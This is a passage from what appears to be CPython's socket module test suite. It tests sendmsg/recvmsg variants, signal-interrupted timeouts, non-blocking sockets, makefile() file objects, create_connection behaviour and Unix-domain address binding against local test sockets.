@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid cloding the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# plaform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
